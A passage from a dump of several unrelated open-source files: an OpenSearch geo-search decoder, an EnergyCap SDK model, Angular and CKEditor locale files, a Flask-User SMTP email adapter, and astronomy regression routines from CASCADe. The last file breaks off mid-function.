                qs = qs.filter(footprint__dwithin=(geom, distance))
            elif relation == "disjoint":
                qs = qs.filter(footprint__distance_gt=(geom, distance))
        elif lon is not None and lat is not None:
            # Bare point search (no radius given).
            geom = Point(lon, lat)
            if relation == "intersects":
                qs = qs.filter(footprint__intersects=geom)
            elif relation == "contains":
                qs = qs.filter(footprint__coveredby=geom)
            elif relation == "disjoint":
                qs = qs.filter(footprint__disjoint=geom)
        if uid:
            qs = qs.filter(identifier=uid)
        return qs
    def get_schema(self, collection=None, model_class=None):
        """Return the parameter schema (name/type/options tuples) used to
        advertise the Geo-extension search parameters in the OpenSearch
        description document.
        """
        return (
            dict(name="bbox", type="box"),
            dict(name="geom", type="geometry", profiles=[
                dict(
                    href="http://www.opengis.net/wkt/LINESTRING",
                    title="This service accepts WKT LineStrings"
                ),
                dict(
                    href="http://www.opengis.net/wkt/POINT",
                    title="This service accepts WKT Point"
                ),
                dict(
                    href="http://www.opengis.net/wkt/POLYGON",
                    title="This service accepts WKT Polygons"
                ),
                dict(
                    href="http://www.opengis.net/wkt/MULTILINESTRING",
                    title="This service accepts WKT Multi-LineStrings"
                ),
                dict(
                    href="http://www.opengis.net/wkt/MULTIPOINT",
                    title="This service accepts WKT Multi-Point"
                ),
                dict(
                    href="http://www.opengis.net/wkt/MULTIPOLYGON",
                    title="This service accepts WKT Multi-Polygons"
                ),
            ]),
            dict(name="lon", type="lon"),
            dict(name="lat", type="lat"),
            dict(name="r", type="radius"),
            dict(name="georel", type="relation",
                options=["intersects", "contains", "disjoint"]
            ),
            dict(name="uid", type="uid")
        )
def parse_bbox(raw):
    """Parse a comma-separated ``minx,miny,maxx,maxy`` bounding box string
    into a GEOS geometry.

    When ``minx > maxx`` the box is interpreted as crossing the antimeridian
    and a two-part MultiPolygon is returned instead of a single Polygon.

    Raises ValueError for non-numeric values or a coordinate count != 4.
    """
    coords = [float(part) for part in raw.split(",")]
    if len(coords) != 4:
        raise ValueError("Invalid number of coordinates in 'bbox'.")
    minx, miny, maxx, maxy = coords
    if minx > maxx:
        # Dateline-crossing box: split at +/-180 degrees.
        return MultiPolygon(
            Polygon.from_bbox((minx, miny, 180.0, maxy)),
            Polygon.from_bbox((-180.0, miny, maxx, maxy)),
        )
    return Polygon.from_bbox(coords)
def parse_radius(raw):
    """Parse a search radius given in meters into a GeoDjango ``D``
    (Distance) object.

    Raises ValueError for negative or non-numeric input.
    """
    # TODO: allow the specification of additional units
    meters = float(raw)
    if meters < 0:
        raise ValueError("Invalid radius specified")
    return D(m=meters)
class GeoExtensionDecoder(kvp.Decoder):
    """KVP decoder for the OpenSearch 'Geo' extension search parameters."""
    box = kvp.Parameter(num="?", type=parse_bbox)
    # Decode the radius with ``parse_radius`` (meters wrapped in a GeoDjango
    # ``Distance``) instead of a bare ``float``: the Geo extension defines the
    # 'radius' parameter in meters, while GeoDjango interprets a plain number
    # in the native units of the geometry field (degrees for geographic SRS).
    # ``parse_radius`` already existed in this module but was left unused.
    radius = kvp.Parameter(num="?", type=parse_radius)
    geometry = kvp.Parameter(num="?", type=GEOSGeometry)
    lon = kvp.Parameter(num="?", type=float)
    lat = kvp.Parameter(num="?", type=float)
    relation = kvp.Parameter(num="?",
        type=enum(("intersects", "contains", "disjoint"), False),
        default="intersects"
    )
    uid = kvp.Parameter(num="?")
/EnergyCapSdk-8.2304.4743.tar.gz/EnergyCapSdk-8.2304.4743/energycap/sdk/models/place_digest_actual_and_calendarized_yearly_response_commodity_data_py3.py |
from msrest.serialization import Model
class PlaceDigestActualAndCalendarizedYearlyResponseCommodityData(Model):
    """PlaceDigestActualAndCalendarizedYearlyResponseCommodityData.

    :param commodity_code: The commodity code
    :type commodity_code: str
    :param commodity_info: The commodity info
    :type commodity_info: str
    :param commodity_id: The commodity identifier
    :type commodity_id: int
    :param target_comparison:
    :type target_comparison:
     ~energycap.sdk.models.PlaceDigestActualAndCalendarizedYearlyResponseTargetComparison
    :param cost_unit:
    :type cost_unit: ~energycap.sdk.models.UnitChild
    :param common_use_unit:
    :type common_use_unit: ~energycap.sdk.models.UnitChild
    :param common_demand_unit:
    :type common_demand_unit: ~energycap.sdk.models.UnitChild
    :param results: An array of yearly data
    :type results:
     list[~energycap.sdk.models.PlaceDigestActualAndCalendarizedYearlyResponseCommodityResults]
    """

    # NOTE(review): this looks like AutoRest/msrest-generated SDK code;
    # prefer regenerating from the API spec over hand-editing — confirm.
    # Maps each Python attribute to its JSON wire key and msrest type string,
    # consumed by msrest.serialization.Model during (de)serialization.
    _attribute_map = {
        'commodity_code': {'key': 'commodityCode', 'type': 'str'},
        'commodity_info': {'key': 'commodityInfo', 'type': 'str'},
        'commodity_id': {'key': 'commodityId', 'type': 'int'},
        'target_comparison': {'key': 'targetComparison', 'type': 'PlaceDigestActualAndCalendarizedYearlyResponseTargetComparison'},
        'cost_unit': {'key': 'costUnit', 'type': 'UnitChild'},
        'common_use_unit': {'key': 'commonUseUnit', 'type': 'UnitChild'},
        'common_demand_unit': {'key': 'commonDemandUnit', 'type': 'UnitChild'},
        'results': {'key': 'results', 'type': '[PlaceDigestActualAndCalendarizedYearlyResponseCommodityResults]'},
    }

    def __init__(self, *, commodity_code: str=None, commodity_info: str=None, commodity_id: int=None, target_comparison=None, cost_unit=None, common_use_unit=None, common_demand_unit=None, results=None, **kwargs) -> None:
        # All parameters are keyword-only and optional; extra kwargs are
        # forwarded to the msrest Model base class.
        super(PlaceDigestActualAndCalendarizedYearlyResponseCommodityData, self).__init__(**kwargs)
        self.commodity_code = commodity_code
        self.commodity_info = commodity_info
        self.commodity_id = commodity_id
        self.target_comparison = target_comparison
        self.cost_unit = cost_unit
        self.common_use_unit = common_use_unit
        self.common_demand_unit = common_demand_unit
        self.results = results
/Flask-Statics-Helper-1.0.0.tar.gz/Flask-Statics-Helper-1.0.0/flask_statics/static/angular/i18n/angular-locale_ja-jp.js | 'use strict';
// Generated Angular "ngLocale" bundle for the ja-jp locale: registers the
// $locale service value with date/time names, date format patterns and
// number/currency patterns consumed by Angular's date/number/currency filters.
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"\u5348\u524d",
"\u5348\u5f8c"
],
"DAY": [
"\u65e5\u66dc\u65e5",
"\u6708\u66dc\u65e5",
"\u706b\u66dc\u65e5",
"\u6c34\u66dc\u65e5",
"\u6728\u66dc\u65e5",
"\u91d1\u66dc\u65e5",
"\u571f\u66dc\u65e5"
],
"MONTH": [
"1\u6708",
"2\u6708",
"3\u6708",
"4\u6708",
"5\u6708",
"6\u6708",
"7\u6708",
"8\u6708",
"9\u6708",
"10\u6708",
"11\u6708",
"12\u6708"
],
"SHORTDAY": [
"\u65e5",
"\u6708",
"\u706b",
"\u6c34",
"\u6728",
"\u91d1",
"\u571f"
],
"SHORTMONTH": [
"1\u6708",
"2\u6708",
"3\u6708",
"4\u6708",
"5\u6708",
"6\u6708",
"7\u6708",
"8\u6708",
"9\u6708",
"10\u6708",
"11\u6708",
"12\u6708"
],
"fullDate": "y\u5e74M\u6708d\u65e5EEEE",
"longDate": "y\u5e74M\u6708d\u65e5",
"medium": "y/MM/dd H:mm:ss",
"mediumDate": "y/MM/dd",
"mediumTime": "H:mm:ss",
"short": "y/MM/dd H:mm",
"shortDate": "y/MM/dd",
"shortTime": "H:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "\u00a5",
"DECIMAL_SEP": ".",
"GROUP_SEP": ",",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "\u00a4-",
"negSuf": "",
"posPre": "\u00a4",
"posSuf": ""
}
]
},
"id": "ja-jp",
// Japanese has no grammatical plural: every number maps to OTHER.
"pluralCat": function(n, opt_precision) { return PLURAL_CATEGORY.OTHER;}
});
}]);
/FlaskCms-0.0.4.tar.gz/FlaskCms-0.0.4/flask_cms/static/js/ckeditor/plugins/a11yhelp/dialogs/lang/en.js | /*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
// English localization strings for CKEditor's Accessibility Help (a11yhelp)
// plugin dialog; ${...} tokens are substituted with the configured keystrokes.
CKEDITOR.plugins.setLang("a11yhelp","en",{title:"Accessibility Instructions",contents:"Help Contents. To close this dialog press ESC.",legend:[{name:"General",items:[{name:"Editor Toolbar",legend:"Press ${toolbarFocus} to navigate to the toolbar. Move to the next and previous toolbar group with TAB and SHIFT-TAB. Move to the next and previous toolbar button with RIGHT ARROW or LEFT ARROW. Press SPACE or ENTER to activate the toolbar button."},{name:"Editor Dialog",legend:"Inside a dialog, press TAB to navigate to next dialog field, press SHIFT + TAB to move to previous field, press ENTER to submit dialog, press ESC to cancel dialog. For dialogs that have multiple tab pages, press ALT + F10 to navigate to tab-list. Then move to next tab with TAB OR RIGTH ARROW. Move to previous tab with SHIFT + TAB or LEFT ARROW. Press SPACE or ENTER to select the tab page."},
{name:"Editor Context Menu",legend:"Press ${contextMenu} or APPLICATION KEY to open context-menu. Then move to next menu option with TAB or DOWN ARROW. Move to previous option with SHIFT+TAB or UP ARROW. Press SPACE or ENTER to select the menu option. Open sub-menu of current option with SPACE or ENTER or RIGHT ARROW. Go back to parent menu item with ESC or LEFT ARROW. Close context menu with ESC."},{name:"Editor List Box",legend:"Inside a list-box, move to next list item with TAB OR DOWN ARROW. Move to previous list item with SHIFT + TAB or UP ARROW. Press SPACE or ENTER to select the list option. Press ESC to close the list-box."},
{name:"Editor Element Path Bar",legend:"Press ${elementsPathFocus} to navigate to the elements path bar. Move to next element button with TAB or RIGHT ARROW. Move to previous button with SHIFT+TAB or LEFT ARROW. Press SPACE or ENTER to select the element in editor."}]},{name:"Commands",items:[{name:" Undo command",legend:"Press ${undo}"},{name:" Redo command",legend:"Press ${redo}"},{name:" Bold command",legend:"Press ${bold}"},{name:" Italic command",legend:"Press ${italic}"},{name:" Underline command",
legend:"Press ${underline}"},{name:" Link command",legend:"Press ${link}"},{name:" Toolbar Collapse command",legend:"Press ${toolbarCollapse}"},{name:" Access previous focus space command",legend:"Press ${accessPreviousSpace} to access the closest unreachable focus space before the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},{name:" Access next focus space command",legend:"Press ${accessNextSpace} to access the closest unreachable focus space after the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},
{name:" Accessibility Help",legend:"Press ${a11yHelp}"}]}]});
/Flask-Statics-Helper-1.0.0.tar.gz/Flask-Statics-Helper-1.0.0/flask_statics/static/angular/i18n/angular-locale_tn-za.js | 'use strict';
// Generated Angular "ngLocale" bundle for the tn-za (Tswana, South Africa)
// locale: registers the $locale service value with date/time names, date
// format patterns and number/currency patterns.
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
// Number of digits after the decimal point in n's string representation.
function getDecimals(n) {
n = n + '';
var i = n.indexOf('.');
return (i == -1) ? 0 : n.length - i - 1;
}
// CLDR plural operands: v = count of visible fraction digits (capped at 3),
// f = those fraction digits as an integer.
function getVF(n, opt_precision) {
var v = opt_precision;
if (undefined === v) {
v = Math.min(getDecimals(n), 3);
}
var base = Math.pow(10, v);
var f = ((n * base) | 0) % base;
return {v: v, f: f};
}
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"AM",
"PM"
],
"DAY": [
"Tshipi",
"Mosopulogo",
"Labobedi",
"Laboraro",
"Labone",
"Labotlhano",
"Matlhatso"
],
"MONTH": [
"Ferikgong",
"Tlhakole",
"Mopitlo",
"Moranang",
"Motsheganang",
"Seetebosigo",
"Phukwi",
"Phatwe",
"Lwetse",
"Diphalane",
"Ngwanatsele",
"Sedimonthole"
],
"SHORTDAY": [
"Tsh",
"Mos",
"Bed",
"Rar",
"Ne",
"Tla",
"Mat"
],
"SHORTMONTH": [
"Fer",
"Tlh",
"Mop",
"Mor",
"Mot",
"See",
"Phu",
"Pha",
"Lwe",
"Dip",
"Ngw",
"Sed"
],
"fullDate": "y MMMM d, EEEE",
"longDate": "y MMMM d",
"medium": "y MMM d HH:mm:ss",
"mediumDate": "y MMM d",
"mediumTime": "HH:mm:ss",
"short": "y-MM-dd HH:mm",
"shortDate": "y-MM-dd",
"shortTime": "HH:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "R",
"DECIMAL_SEP": ".",
"GROUP_SEP": "\u00a0",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "\u00a4-",
"negSuf": "",
"posPre": "\u00a4",
"posSuf": ""
}
]
},
"id": "tn-za",
// ONE only for the integer 1 with no visible fraction digits; else OTHER.
"pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]);
/Flask-User-1.0.2.2.tar.gz/Flask-User-1.0.2.2/flask_user/email_adapters/smtp_email_adapter.py |
from __future__ import print_function
import smtplib
import socket
from flask import current_app
# Non-system imports are moved into the methods to make them an optional requirement
from flask_user import ConfigError, EmailError
from flask_user.email_adapters import EmailAdapterInterface
class SMTPEmailAdapter(EmailAdapterInterface):
    """ Implements the EmailAdapter interface to send emails with SMTP using Flask-Mail."""

    def __init__(self, app):
        """Check config settings and setup Flask-Mail.

        Args:
            app(Flask): The Flask application instance.

        Raises:
            ConfigError: If the optional Flask-Mail dependency is not
                installed.
        """
        super(SMTPEmailAdapter, self).__init__(app)

        # Setup Flask-Mail
        # Imported lazily so Flask-Mail stays an optional dependency.
        try:
            from flask_mail import Mail
        except ImportError:
            raise ConfigError(
                "The Flask-Mail package is missing. Install Flask-Mail with 'pip install Flask-Mail'.")
        self.mail = Mail(app)

    def send_email_message(self, recipient, subject, html_message, text_message, sender_email, sender_name):
        """ Send email message via Flask-Mail.

        Args:
            recipient: Email address or tuple of (Name, Email-address).
            subject: Subject line.
            html_message: The message body in HTML.
            text_message: The message body in plain text.
            sender_email: Email address of the sender.
            sender_name: Optional display name of the sender; when set, the
                sender is formatted as '"Name" <address>'.

        Raises:
            EmailError: On SMTP connection or authentication failures.
        """
        # Construct sender from sender_name and sender_email
        sender = '"%s" <%s>' % (sender_name, sender_email) if sender_name else sender_email

        # Send email via SMTP except when we're testing
        if not current_app.testing:    # pragma: no cover
            try:
                # Prepare email message
                # Lazy import: Flask-Mail availability was verified in __init__.
                from flask_mail import Message
                message = Message(
                    subject,
                    sender=sender,
                    recipients=[recipient],
                    html=html_message,
                    body=text_message)

                # Send email message
                self.mail.send(message)

            # Print helpful error messages on exceptions
            # socket.error is an alias of OSError and also covers
            # connection-refused style failures.
            except (socket.gaierror, socket.error) as e:
                raise EmailError('SMTP Connection error: Check your MAIL_SERVER and MAIL_PORT settings.')
            except smtplib.SMTPAuthenticationError:
                raise EmailError('SMTP Authentication error: Check your MAIL_USERNAME and MAIL_PASSWORD settings.')
/CASCADe-spectroscopy-1.1.14.tar.gz/CASCADe-spectroscopy-1.1.14/cascade/cpm_model/cpm_model.py | import numpy as np
from types import SimpleNamespace
import itertools
from collections.abc import Iterable
import ast
import warnings
import time as time_module
import copy
import ray
from numba import jit
from scipy.linalg import svd
from scipy.linalg import solve_triangular
from scipy.linalg import cholesky
import astropy.units as u
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from ..exoplanet_tools import lightcurve
from ..data_model import SpectralData
from ..data_model import SpectralDataTimeSeries
from cascade import __version__
__all__ = ['ols',
'check_causality', 'select_regressors', 'return_design_matrix',
'log_likelihood', 'modified_AIC', 'create_regularization_matrix',
'return_lambda_grid', 'regressionDataServer',
'rayRegressionDataServer', 'regressionControler',
'rayRegressionControler', 'ridge', 'rayRidge',
'make_bootstrap_samples',
'regressionParameterServer', 'rayRegressionParameterServer',
'regressionWorker', 'rayRegressionWorker']
def ols(design_matrix, data, covariance=None):
    r"""
    Ordinary least squares.

    Parameters
    ----------
    design_matrix : 'numpy.ndarray'
        The design or regression matrix used in the regression modeling.
    data : 'numpy.ndarray'
        Vector of data points to be modeled.
    covariance : 'numpy.ndarray', optional
        Covariance matrix of the data, used as weight in the regression
        (generalized least squares). The default is None (unweighted fit).

    Returns
    -------
    fit_parameters : 'numpy.ndarray'
        Linear regression parameters.
    err_fit_parameters : 'numpy.ndarray'
        Error estimate on the regression parameters.
    sigma_hat_sqr : 'float'
        Mean squared error.

    Raises
    ------
    ValueError
        If the design matrix has more regressors (columns) than data
        points (rows).

    Notes
    -----
    This routine solves the linear equation

    .. math:: A x = y

    by finding optimal solution :math:`\hat{x}` by minimizing

    .. math::

        || y - A*\hat{x} ||^2

    For details on the implementation see [1]_, [2]_, [3]_, [4]_

    References
    ----------
    .. [1] PHD thesis by Diana Maria SIMA, "Regularization techniques in
              Model Fitting and Parameter estimation", KU Leuven 2006
    .. [2] Hogg et al 2010, "Data analysis recipies: Fitting a model to data"
    .. [3] Rust & O'Leary, "Residual periodograms for choosing regularization
              parameters for ill-posed problems"
    .. [4] Krakauer et al "Using generalized cross-validation to select
              parameters in inversions for regional carbon fluxes"

    Examples
    --------
    >>> import numpy as np
    >>> from cascade.cpm_model import ols
    >>> A = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1], [1, 1, 0], [-1, 1, 0]])
    >>> coef = np.array([4, 2, 7])
    >>> b = np.dot(A, coef)
    >>> b = b + np.random.normal(0.0, 0.01, size=b.size)
    >>> results = ols(A, b)
    >>> print(results)
    """
    if covariance is not None:
        # Whiten the data and design matrix with the Cholesky factor of the
        # covariance matrix (generalized least squares).
        Gcovariance = cholesky(covariance, lower=True)
        weighted_design_matrix = solve_triangular(Gcovariance, design_matrix,
                                                  lower=True,
                                                  check_finite=False)
        data_weighted = solve_triangular(Gcovariance, data, lower=True,
                                         check_finite=False)
        # Rescale to a mean of unity for numerical stability.
        scaling_matrix = np.diag(np.full(len(data_weighted),
                                         1.0/np.mean(data_weighted)))
        data_weighted = np.dot(scaling_matrix, data_weighted)
        weighted_design_matrix = np.dot(scaling_matrix, weighted_design_matrix)
    else:
        weighted_design_matrix = design_matrix
        data_weighted = data
    dim_dm = weighted_design_matrix.shape
    if dim_dm[0] - dim_dm[1] < 1:
        # BUG FIX: previously an AssertionError instance was created here
        # but never raised, so the invalid input went undetected.
        raise ValueError("Wrong dimensions of design matrix: "
                         "more regressors as data; Aborting")
    # First make SVD of design matrix A
    U, sigma, VH = svd(weighted_design_matrix)
    # Residual of the data projected outside the column space of A:
    # residual_not_reg = (u[:,rnk:].dot(u[:,rnk:].T)).dot(y)
    residual_not_reg = np.linalg.multi_dot([U[:, dim_dm[1]:],
                                            U[:, dim_dm[1]:].T, data_weighted])
    # calculate the filter factors (identity: no regularization)
    F = np.identity(sigma.shape[0])
    Fsigma_inv = np.diag(1.0/sigma)
    # Solution of the linear system
    fit_parameters = np.linalg.multi_dot([VH.T, Fsigma_inv,
                                          U.T[:dim_dm[1], :], data_weighted])
    # calculate the general residual vector (b-model), which can be calculated
    # by using U1 (mxn) and U2 (mxm-n), with U=[U1,U2]
    residual_reg = residual_not_reg + \
        np.linalg.multi_dot([U[:, :dim_dm[1]], np.identity(dim_dm[1]) - F,
                             U[:, :dim_dm[1]].T, data_weighted])
    effective_degrees_of_freedom = (dim_dm[0] - dim_dm[1])
    sigma_hat_sqr = np.dot(residual_reg.T, residual_reg) / \
        effective_degrees_of_freedom
    # calculate the errors on the fit parameters
    err_fit_parameters = np.sqrt(sigma_hat_sqr *
                                 np.diag(np.linalg.multi_dot([VH.T,
                                                              Fsigma_inv**2,
                                                              VH])))
    return fit_parameters, err_fit_parameters, sigma_hat_sqr
def ridge(input_regression_matrix, input_data, input_covariance,
          input_delta, input_alpha):
    r"""
    Ridge regression with regularization-strength selection by GCV.

    Parameters
    ----------
    input_regression_matrix : 'numpy.ndarray'
        The design or regression matrix used in the regularized least square
        fit.
    input_data : 'numpy.ndarray'
        Vector of data to be fit.
    input_covariance : 'numpy.ndarray'
        Covariance matrix used as weight in the least square fit.
    input_delta : 'numpy.ndarray'
        Regularization matrix. For ridge regression this is the unity matrix.
    input_alpha : 'float' or 'numpy.ndarray'
        Regularization strength. If an array of values is given, the optimal
        strength is selected by generalized cross validation (GCV).

    Returns
    -------
    beta : 'numpy.ndarray'
        Fitted regression parameters.
    rss : 'float'
        Sum of squared residuals.
    mse : 'float'
        Mean square error.
    degrees_of_freedom : 'float'
        The effective degrees of freedom of the fit.
    model_unscaled : 'numpy.ndarray'
        The fitted regression model.
    optimal_regularization : 'float'
        The optimal regularization strength determined by generalized cross
        validation.
    aicc : 'float'
        Corrected Aikake information criterium.

    Notes
    -----
    This routine solves the linear equation

    .. math:: A x = y

    by finding optimal solution :math:`\hat{x}` by minimizing

    .. math::

        || y - A*\hat{x} ||^2 + \lambda * || \hat{x} ||^2

    For details on the implementation see [5]_, [6]_, [7]_, [8]_

    References
    ----------
    .. [5] PHD thesis by Diana Maria SIMA, "Regularization techniques in
              Model Fitting and Parameter estimation", KU Leuven 2006
    .. [6] Hogg et al 2010, "Data analysis recipies: Fitting a model to data"
    .. [7] Rust & O'Leary, "Residual periodograms for choosing regularization
              parameters for ill-posed problems"
    .. [8] Krakauer et al "Using generalized cross-validation to select
              parameters in inversions for regional carbon fluxes"
    """
    n_data, n_parameter = input_regression_matrix.shape
    # Whiten the data and regression matrix with the Cholesky factor of
    # the covariance matrix (generalized least squares weighting).
    Gcovariance = cholesky(input_covariance, lower=True)
    regression_matrix = solve_triangular(Gcovariance, input_regression_matrix,
                                         lower=True, check_finite=False)
    data = solve_triangular(Gcovariance, input_data, lower=True,
                            check_finite=False)
    # Rescale to a mean of unity for numerical stability.
    scaling_matrix = np.diag(np.full(len(data),
                                     1.0/np.mean(data)))
    data = np.dot(scaling_matrix, data)
    regression_matrix = np.dot(scaling_matrix, regression_matrix)
    # Work in the SVD basis of the whitened regression matrix.
    U, D, Vh = svd(regression_matrix, full_matrices=False, check_finite=False,
                   overwrite_a=True, lapack_driver='gesdd')
    R = np.dot(U, np.diag(D))
    delta = np.dot(np.dot(Vh, input_delta), Vh.T)
    RY = np.dot(R.T, data)
    unity_matrix_ndata = np.identity(n_data)
    if isinstance(input_alpha, Iterable):
        # Pick the regularization strength on the grid which minimizes the
        # generalized cross validation (GCV) score.
        gcv_list = []
        for alpha_try in input_alpha:
            F = np.diag(D**2) + alpha_try*delta
            G = cholesky(F, lower=True)
            x = solve_triangular(G, R.T, lower=True, check_finite=False)
            H = np.dot(x.T, x)
            residual = np.dot(unity_matrix_ndata-H, data)
            rss = np.dot(residual.T, residual)
            degrees_of_freedom = np.trace(H)
            if (n_data-degrees_of_freedom) >= 1:
                gcv = n_data*(np.trace(unity_matrix_ndata-H))**-2 * rss
            else:
                # Guard against (near) zero residual degrees of freedom.
                gcv = 1.e16
            gcv_list.append(gcv)
        opt_idx = np.argmin(gcv_list)
        optimal_regularization = input_alpha[opt_idx]
    else:
        optimal_regularization = input_alpha
    # Solve linear system with optimal regularization
    F = np.diag((D)**2) + optimal_regularization*delta
    G = cholesky(F, lower=True)
    x = solve_triangular(G, R.T, lower=True, check_finite=False)
    H = np.dot(x.T, x)
    x = solve_triangular(G, RY, lower=True, check_finite=False)
    x = solve_triangular(G.T, x, lower=False, check_finite=False)
    beta = np.dot(Vh.T, x)
    residual = np.dot(unity_matrix_ndata-H, data)
    rss = np.dot(residual.T, residual)
    degrees_of_freedom = np.trace(H)
    mse = rss/(n_data-degrees_of_freedom)
    aicc = n_data*np.log(rss) + 2*degrees_of_freedom + \
        (2*degrees_of_freedom * (degrees_of_freedom+1)) / \
        (n_data-degrees_of_freedom-1)
    # The model is evaluated with the original (unwhitened, unscaled)
    # regression matrix so it is in the units of the input data.
    model_unscaled = np.dot(input_regression_matrix, beta)
    return beta, rss, mse, degrees_of_freedom, model_unscaled, \
        optimal_regularization, aicc
# BUG FIX: ridge returns a 7-tuple (beta, rss, mse, degrees_of_freedom,
# model_unscaled, optimal_regularization, aicc); num_returns must match the
# number of returned values, otherwise ray errors when the task executes.
rayRidge = ray.remote(num_returns=7)(ridge)
def check_causality():
    """
    Check if all data has a causal connection.

    Returns
    -------
    causal_mask : ndarray of 'bool'
        Mask of data which has good causal connection with other data.
    """
    # Placeholder implementation: all data is currently assumed to be
    # causally connected.
    return True
def select_regressors(selection_mask, exclusion_distance):
    """
    Return list with indici of the regressors for each wavelength data point.

    Parameters
    ----------
    selection_mask : 'ndarray' of 'bool'
        Mask selecting all data for which a regressor matrix has to be
        constructed (unmasked, i.e. False, entries are used).
    exclusion_distance : 'int'
        Minimum distance (in the dispersion direction) to a data point
        within which no data is selected to be used as regressor.

    Returns
    -------
    regressor_list : 'list'
        List of entries pairing a data index with the indici of the data
        used as regressors for that data point, plus the total number of
        data points.
    """
    mask = selection_mask
    # Treat 1d input as a single-column 2d mask.
    if mask.ndim == 1:
        mask = np.expand_dims(mask, axis=1)
    # All unmasked data points, both as coordinate tuples and as
    # per-axis index arrays.
    used_data_index = [tuple(coord) for coord in np.argwhere(~mask).tolist()]
    dispersion_index, cross_dispersion_index = np.where(~mask)
    ndatapoints = len(used_data_index)
    regressor_list = []
    for row, col in used_data_index:
        # Only data far enough away along the dispersion axis may serve
        # as regressor for this point.
        far_enough = np.abs(row - dispersion_index) >= exclusion_distance
        regressor_list.append([(row, col),
                               (dispersion_index[far_enough],
                                cross_dispersion_index[far_enough]),
                               ndatapoints])
    return regressor_list
def return_PCA(matrix, n_components):
    """
    Return PCA components of input matrix.

    Parameters
    ----------
    matrix : 'numpy.ndarray'
        Input matrix for which the principal components are calculated.
        The PCA is fit on the transposed matrix, i.e. each row of the
        input is treated as a feature.
    n_components : 'int'
        Requested number of PCA components; capped at the number of rows
        of the input matrix.

    Returns
    -------
    pca_matrix : 'numpy.ndarray'
        The principal components.
    pca_scores : 'numpy.ndarray'
        The transposed ``components_`` of the fitted sklearn PCA estimator,
        which can be used to back-transform the principal components into
        the original matrix (up to the subtracted mean).
    """
    pca = PCA(n_components=np.min([n_components, matrix.shape[0]]),
              whiten=False, svd_solver='auto')
    pca_matrix = pca.fit_transform(matrix.T).T
    pca_scores = pca.components_.T
    return pca_matrix, pca_scores
# @jit(nopython=True, cache=True, parallel=True)
def log_likelihood(data, covariance, model):
    """
    Calculate the log likelihood of a model given data and its covariance.

    Parameters
    ----------
    data : 'ndarray'
        Data array to be modeled.
    covariance : 'ndarray'
        The covariance of the data.
    model : 'ndarray'
        Regression model of the data.

    Returns
    -------
    lnL : 'float'
        Log likelihood.

    Notes
    -----
    The covariance determinant term is evaluated from the Cholesky factor:
    2*np.sum(np.log(np.diag(np.linalg.cholesky(covariance))))
    """
    npoints = len(data)
    deviation = data - model
    # Cholesky factorization of the covariance; whitening the residual
    # yields the chi-squared term, the factor's diagonal the determinant.
    chol_factor = cholesky(covariance, lower=True)
    whitened = solve_triangular(chol_factor, deviation, lower=True,
                                check_finite=False)
    chi_squared = np.dot(whitened.T, whitened)
    log_det_term = 2*np.sum(np.log(np.diag(chol_factor)))
    norm_term = npoints*np.log(2.0*np.pi)
    return -0.5*(norm_term + log_det_term + chi_squared)
@jit(nopython=True, cache=True)
def modified_AIC(lnL, n_data, n_parameters):
    """
    Calculate the modified (small-sample corrected) AIC.

    Parameters
    ----------
    lnL : 'float'
        Log likelihood.
    n_data : 'int'
        Number of data points.
    n_parameters : 'int'
        Number of free model parameters.

    Returns
    -------
    AICc : 'float'
        Modified Aikake information criterium.
    """
    # Standard AIC plus the finite-sample correction term.
    base_aic = -2*lnL + 2*n_parameters
    correction = (2*n_parameters*(n_parameters+1))/(n_data-n_parameters-1)
    return base_aic + correction
def create_regularization_matrix(method, n_regressors, n_not_regularized):
    """
    Create regularization matrix.

    Two options are implemented: The first one 'value' returns a penalty
    matrix for the classical ridge regression. The second option
    'derivative' is consistent with a fused ridge penalty (as introduced by
    Goeman, 2008).

    Parameters
    ----------
    method : 'string'
        Method used to calculate the regularization matrix. Allowed values
        are 'value' or 'derivative'.
    n_regressors : 'int'
        Number of regressors.
    n_not_regularized : 'int'
        Number of leading regressors which should not have a regularization
        term.

    Raises
    ------
    ValueError
        In case the method input parameter has a wrong value a ValueError
        is raised.

    Returns
    -------
    delta : 'ndarray'
        (n_regressors x n_regressors) regularization matrix.
    """
    allowed_methods = ['value', 'derivative']
    if method not in allowed_methods:
        raise ValueError("regularization method not recognized. "
                         "Allowed values are: {}".format(allowed_methods))
    delta = np.zeros((n_regressors, n_regressors))
    n_regularized = n_regressors - n_not_regularized
    if method == 'value':
        # Classical ridge: penalize the value of each regularized regressor.
        delta[n_not_regularized:, n_not_regularized:] += \
            np.diag(np.ones(n_regularized))
    elif method == 'derivative':
        # Fused ridge: penalize differences between neighbouring regressors
        # with a tridiagonal (-1, 2, -1) difference operator ...
        delta_temp = np.diag(-1*np.ones(n_regularized-1), 1) + \
            np.diag(-1*np.ones(n_regularized-1), -1) + \
            np.diag(2*np.ones(n_regularized))
        # ... with reduced weight on the two boundary elements.
        delta_temp[0, 0] = 1.0
